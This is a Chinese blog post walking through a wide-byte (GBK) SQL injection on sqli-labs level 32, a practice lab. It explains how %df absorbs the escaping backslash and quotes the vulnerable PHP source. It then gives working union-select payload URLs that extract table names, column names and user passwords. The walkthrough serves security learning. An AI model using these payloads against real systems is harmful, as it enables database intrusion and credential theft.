渗透之sql注入---宽字节注入

已于 2024-05-10 13:54:11 修改
阅读量455 收藏 9
点赞数 8
文章标签: sql 数据库
于 2024-05-09 20:52:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64302290/article/details/138630172
版权

目录

宽字节注入原理:

实战:

源码分析:

开始注入:

找注入点:

注入数据库名:

注入表名:

注入列明:

注入具体值:http://sqli-labs:8084/less-32/?id=-1%df%27union%20select%201,group_concat(username,0x3a,password),3%20%20from%20%20users--+

宽字节注入原理:
 

        宽字节注入就是在对用户输入进行处理时,将编码方式改变,当某些关键字符被过滤(转义)时,我们可以使用其他的编码在被转义的字符前面,这样就可以组成一个新的字符从而来实现绕过。

实战:

本次的实战在sql靶场上的第32关进行操作。

源码分析:

关键代码:

通过我们的分析可知:我们输入的单双引号被替换为了反斜线。gbk中反斜线的编码为:%5C

utf-8编码被换为gbk,并且容纳2字节。%df%5c恰好可以组成一个汉子的编码(运的编码)。所以我们可以使用这个来绕过。

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}


if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 
//这里将utf-8编码转化为gbk了。
//utf-8一般容纳3个字节,gbk一般容纳2个字节
mysql_query("SET NAMES gbk"); //这里突然间转化了编码,变成了gbk编码,
//而gbk编码为两个字节,%df%5c恰好可以组成一个汉字,而汉字占2个字节,所以可以实现逃逸单引号
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#00FF00">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}

开始注入:

找注入点:

1):输入单引号

2):在单引号前输入%df,之后回车

爆了语法错误,说明我们成功的绕过了并找到注入点。

注入数据库名:

http://sqli-labs:8084/less-32/?id=-1%df%27union%20select%201,database(),3%20--+

注入表名:

table_schema=0x7365637572697479:这里的单双引号被过滤了,我们不能使用,但是在mysql中支持16进制,我们可以将数据库security转化为16进制在进行操作。

可以使用在线转化工具:进行转化16进制转换,16进制转换文本字符串,在线16进制转换 | 在线工具 (sojson.com)

http://sqli-labs:8084/less-32/?id=-1%df%27union%20select%201,group_concat(table_name),3%20%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20--+

注入列明:

我们将users这个表的的列明注入出来:

http://sqli-labs:8084/less-32/?id=-1%df%27union%20select%201,group_concat(COLUMN_NAME),3%20%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20%20and%20table_name=0x7573657273--+

注入具体值:

http://sqli-labs:8084/less-32/?id=-1%df%27union%20select%201,group_concat(username,0x3a,password),3%20%20from%20%20users--+

到此本次的注入就成功了,继续注入其他值重复操作即可。

到此本次的注入就成功了,继续注入其他值重复操作即可。

@菜鸟小小
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宽字节注入(知识点)
qq_39416206的博客
03-11 814
宽字节注入
宽字符注入详解与实战
hl1293348082的专栏
04-06 1662
宽字节注入源于程序员设置MySQL连接时的错误配置,如下: set character_set_client=gbk ,这样的配置会引发编码转换从而导致绕过某些防护实现注入漏洞。具体分析一下原理: 正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的',就会被转义为\'; 若存在宽字节注入,输入%df%27时,经过单引号的转义变成了%df%5c%27,之后再数据库查询语句进行GBK多字节编码,即一个中文占用两个字节,一个英文同样占用两个字
slilabs靶场记录宽字节绕过(七)
wanan的博客
10-08 830
slilabs靶场记录宽字节绕过(七)
10-Web安全——SQL注入WAF绕过宽字节注入
网络安全
06-04 880
addslashes()函数在指定的预定义字符前添加反斜杠,这些字符是单引号('),双引号("),反斜线(\)与NUL(NULL字符)。例如客户端提交的参数中如果含有单引号,双引号等这些特殊字符,addslashes函数则会在单引号前加反斜线“\”,将单引号转义成没有功能性的字符。 举个栗子: 以查询用户名为1’的信息为例,username中的参数为1',MySQL数据库在解析这条SQL语句时,会把1后面的单引号认为是闭合符号要求再输入一个单引号闭合,而不是当做username参数的一部分来处.
SQL注入实战:宽字节注入
ting_liang的博客
01-21 1004
2、数据库使用的是GBK编码,PHP编码为UTF8就可能出现宽字节注入,原因是为了防止发生SQL注入,会调用上面所介绍的几种函数,将单引号或双引号转义操作,在单或双引号前加斜杠(\)。1、%DF':会被PHP当中的addslashes函数转义为“%DF\’",\在URL里是“%5C”,那么也就是说,“%DF'"会被转成“%DF%5C%27,倘若网站的字符集是GBK,MYSOL使用的编码也是GBK的话,就会认为“%DF%5C%27"是一个宽字符。addslashes()函数。二、php中的宽字节。
宽字节注入——魔术引号的绕过
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-06 2717
宽字节注入 原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。 靶场地址 第一题: 首先先在url栏输入’ and 1=2 %23 发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码 %df...
超级SQL注入工具使用说明书V1.1 20190303.docx
05-03
【超级SQL注入工具】是一款专为中国用户设计的渗透测试软件,其主要功能是检测和利用HTTP协议中的SQL注入漏洞。该工具使用C#语言编写,通过直接操纵TCP会话进行HTTP交互,提高了发包效率,相比C#自带的...
sql注入系列课程
06-11
3. **不同类型的SQL注入**:课程将涵盖不同类型的SQL注入,如盲注、堆叠注入、宽字节注入等,每种都有其独特的利用方式和应对策略。 4. **服务器权限获取**:在高级阶段,课程可能会介绍如何通过SQL注入进一步获取...
高级Web渗透测试工程师-Mysql注入教程.pdf
11-25
本资源为高级Web渗透测试工程师的Mysql注入教程,涵盖了Mysql的基础知识、安装、操作命令、函数、PHP mysqli链接、数据库结构对比、Mysql注入原理、读取和写入的妙用、后台手工注入及绕过、PHP的魔术引号与宽字节...
分块传输绕过WAF进行SQL注入1
08-03
这里的每个数字表示下一个数据块的字节数,而实际的参数值`10`被分散在不同的块中,这样可以降低WAF识别恶意SQL注入的概率。 为了方便测试和利用这一特性,社区中有开发者编写了如Burp Suite的插件,帮助安全研究...
超级SQL注入工具V1.0正式版源码
03-31
本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持...
sql注入宽字节注入详解
最新发布
Yuppie001的博客
04-14 764
1.什么是宽字节?2.宽字节注入原理二.sqli-labs-36关。
宽字节注入和二次编码注入(绕过/‘转义)less32-33
01mx的博客
03-27 2204
Unicode 统一码,也叫万国码、单一码(Unicode)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 如果把各种文字编码形容为各地的方言,那么Unicode就是世界各国合作开发的一种语言。 宽字符(两个以上字节) 宽字符是指两个字节宽度的编码技术,如UNICODE、GBK、BIG5等。 我们这里的宽字节注入是利用的MySQL的一
sql注入宽字节注入学习与实践
不想当脚本小子的脚本小子
01-17 226
宽字节(两个字节)注入是由于mysql数据库使用了GBK编码,认为两个字符是一个汉字;注入的原理是利用编码转换,将服务器端强制添加的本来用于转移的 \ 符号吃掉而能够使得攻击者输入的引号起到闭合作用而可以进行SQL注入。 当输入 ‘ (单引号)时,被处理成\' 编码后为%5C%27再带入变成id=1\' and …… 无法注入 而当mysql在使用GBK编码时,会认为两个字符串是一个汉字(ASCII码大于128时才到汉字的范围) 输入%df'(%df加一个单引号)时,被处理成%df\' 编码后为%df
sql注入绕过addslashes函数-宽字节注入
G208_522的博客
03-15 4649
宽字节注入 宽字节注入要求: 1、数据库的编码为GBK 2、addslashes()函数,检测在单引号前加\ addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(") 反斜杠(\) NULL 一、单引号探测 http://localhost:8899/sqli-lab/Less-33/index.php?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为G
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 8529
渗透测试-SQL注入宽字节注入
SQL注入防御绕过——宽字节注入
weixin_30839881的博客
07-05 504
01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 latin1编码:单字节编码 gbk编码:使用一字节和双字节编码,0x00-0x7F范围内是一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE UTF-8编码...
Sqli-labs Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-10 2194
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs 原理 mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值